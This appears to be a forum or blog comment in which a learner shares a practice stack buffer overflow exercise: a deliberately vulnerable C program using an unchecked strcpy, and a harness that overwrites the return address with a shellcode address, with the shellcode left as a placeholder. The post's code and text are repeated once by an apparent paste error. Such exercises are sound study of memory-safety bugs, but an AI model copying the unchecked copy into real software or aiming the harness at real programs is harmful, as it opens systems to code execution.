thx.. this was a great example. yesterday i posted a replay with a different email address so i think, it was not acceptet.
i edited your exampleas followed(maybe it was a bit different, im now at work..)
vuln.cpp:
#include <stdio.h>
#include <string.h>
int foo(char *a)
{
char buffer[10];
strcpy((char *)buffer,a);
return 0;
}
int main(int argc, char * argv[])
{
foo(argv[1]);
return 0;
}
test.cpp:
#include <stdio.h>
int main()
{
char shellcode[]="Your provided shellcode";
printf("Address of Shellcode:%p\n",&shellcode);
char buffer[20];
//to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on i thik so its not static) - in my case i thing it was "14"
//dont no the currect conversation:
*(long *)&buffer[14]=(long *)&shellcode;
execlp("./vuln", "vuln", buffer, NULL);
}
ant this worked fine: after execute (./test) I get a result like this:
i edited your exampleas followed(maybe it was a bit different, im now at work..)
vuln.cpp:
#include <stdio.h>
#include <string.h>
int foo(char *a)
{
char buffer[10];
strcpy((char *)buffer,a);
return 0;
}
int main(int argc, char * argv[])
{
foo(argv[1]);
return 0;
}
test.cpp:
#include <stdio.h>
int main()
{
char shellcode[]="Your provided shellcode";
printf("Address of Shellcode:%p\n",&shellcode);
char buffer[20];
//to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on i thik so its not static) - in my case i thing it was "14"
//dont no the currect conversation:
*(long *)&buffer[14]=(long *)&shellcode;
execlp("./vuln", "vuln", buffer, NULL);
}
ant this worked fine: after execute (./test) I get a result like this:
Address of shellcode: 0xbffff0c0
and gdb says too that eip points to 0xbffff0c0
i think this looks good - does it?
anyway, i didnt get a new instance of the shell.
if think maybe the shellcode havnt worked.
greets michael!
[ reply ]